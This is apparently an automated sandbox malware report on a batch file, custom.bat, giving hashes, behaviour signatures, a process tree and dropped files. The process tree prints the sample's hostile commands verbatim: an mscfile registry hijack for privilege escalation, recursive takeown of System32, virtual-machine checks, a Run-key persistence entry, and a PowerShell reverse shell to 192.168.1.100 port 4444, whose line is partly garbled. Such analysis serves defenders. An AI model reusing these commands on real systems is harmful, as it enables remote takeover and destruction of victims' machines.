Analysis

  • max time kernel
    147s
  • max time network
    146s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    08/09/2024, 06:47

General

  • Target

    custom.bat

  • Size

    4KB

  • MD5

    1c63745d54962d205bb3ae879bea1ed4

  • SHA1

    a832c894a4e2b6d486c48b9ea6ec79d94df9537e

  • SHA256

    396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e

  • SHA512

    129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39

  • SSDEEP

    96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix

Signatures

  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Gathers system information 1 TTPs 3 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4664
    • C:\Windows\system32\mode.com
      mode con: cols=800 lines=60
      2⤵
      PID:3096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2492
    • C:\Windows\system32\timeout.exe
      timeout /t 5
      2⤵
      • Delays execution with timeout.exe
      PID:1940
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
      2⤵
      • Modifies registry class
      PID:1964
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3328
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\* /r /d y
        3⤵
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:4732
    • C:\Windows\system32\timeout.exe
      timeout /t 5
      2⤵
      • Delays execution with timeout.exe
      PID:1136
    • C:\Windows\system32\reg.exe
      reg delete "HKCU\Software\Classes\mscfile" /f
      2⤵
      • Modifies registry class
      PID:2484
    • C:\Windows\system32\systeminfo.exe
      systeminfo
      2⤵
      • Gathers system information
      PID:1996
    • C:\Windows\system32\findstr.exe
      findstr /i "VirtualBox"
      2⤵
      PID:404
    • C:\Windows\system32\systeminfo.exe
      systeminfo
      2⤵
      • Gathers system information
      PID:4132
    • C:\Windows\system32\findstr.exe
      findstr /i "VMware"
      2⤵
      PID:4244
    • C:\Windows\system32\systeminfo.exe
      systeminfo
      2⤵
      • Gathers system information
      PID:744
    • C:\Windows\system32\findstr.exe
      findstr /i "Hyper-V"
      2⤵
      PID:1484
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1308
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
      2⤵
      • Adds Run key to start application
      PID:4584
    • C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\* /r /d y
      2⤵
      • Modifies file permissions
      • Suspicious use of AdjustPrivilegeToken
      PID:4204

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    42d4b1d78e6e092af15c7aef34e5cf45

    SHA1

    6cf9d0e674430680f67260194d3185667a2bb77b

    SHA256

    c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

    SHA512

    d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    ad24b88758d81706886a3b4a0f8e7573

    SHA1

    907a8d47973c5d1371cc696216cce9002c421311

    SHA256

    9039dfb2a9c4c27da494ed9cf21541a7b021ce310ffeaa89f36703f4642a9bb3

    SHA512

    b94b8c8bf61c76e6a4967cb5859ca0f6f65a6373434594b2a984c18aefa7c7719097a602f6a760fb09902f4ed1f0b33c4662ccfb38a09eba820170d15a830030

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgdm23tg.xww.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\full_destruction.bat

    Filesize

    285B

    MD5

    4577f08330df24a350ff523ec87bf38e

    SHA1

    5bd1a1b1b8ca3b007102a75f7abaf72348955cf2

    SHA256

    5ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae

    SHA512

    ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2

  • memory/2492-0-0x00007FFA11D53000-0x00007FFA11D54000-memory.dmp

    Filesize

    4KB

  • memory/2492-5-0x0000029CFADD0000-0x0000029CFADF2000-memory.dmp

    Filesize

    136KB

  • memory/2492-6-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmp

    Filesize

    9.9MB

  • memory/2492-10-0x0000029CFAF80000-0x0000029CFAFF6000-memory.dmp

    Filesize

    472KB

  • memory/2492-9-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmp

    Filesize

    9.9MB

  • memory/2492-28-0x00007FFA11D50000-0x00007FFA1273C000-memory.dmp

    Filesize

    9.9MB